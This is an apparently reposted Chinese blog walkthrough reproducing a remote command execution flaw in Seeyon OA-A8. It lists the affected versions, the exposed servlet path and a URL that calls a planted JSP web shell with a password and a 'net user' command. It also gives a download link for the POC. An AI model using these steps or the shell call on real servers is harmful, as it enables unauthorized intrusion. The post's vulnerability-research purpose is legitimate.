致远OA-A8系统的0day远程命令执行的实战

致远OA-A8系统的0day远程命令执行的实战

    • 1.环境是实战,漏洞已经提交,打码子处理
    • 2.详细漏洞信息和修补参考CNVD官网查看https://www.cnvd.org.cn/webinfo/show/5095
    • 3漏洞影响范围
    • 4漏洞的复现
    • 第一步
    • 第二步
    • 第三步
    • 附上POC 请勿用非法用途,只供研究和学习

1.环境是实战,漏洞已经提交,打码子处理

2.详细漏洞信息和修补参考CNVD官网查看https://www.cnvd.org.cn/webinfo/show/5095

3漏洞影响范围

漏洞影响的产品版本包括:

致远A8-V5协同管理软件 V6.1sp1

致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3

致远A8+协同管理软件V7.1

4漏洞的复现

先采集一波url,找到对应版本,这个就不细说了

第一步

先访问这个路径,看有没有开启远程Servlet接口暴露

/seeyon/htmlofficeservlet

成功反馈
致远OA-A8系统的0day远程命令执行的实战_第1张图片

第二步

搞出Burp进行改包,上POC
致远OA-A8系统的0day远程命令执行的实战_第2张图片
发包 回包
致远OA-A8系统的0day远程命令执行的实战_第3张图片
致远OA-A8系统的0day远程命令执行的实战_第4张图片
这算是写入了

第三步

调用命令执行
访问 /test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+net user
致远OA-A8系统的0day远程命令执行的实战_第5张图片

附上POC 请勿用非法用途,只供研究和学习

链接:https://pan.baidu.com/s/11Yy49Fu5kc2uuisIzPbPLA
提取码:0qk7
复制这段内容后打开百度网盘手机App,操作更方便哦

你可能感兴趣的:(WEB,漏洞复现和分析)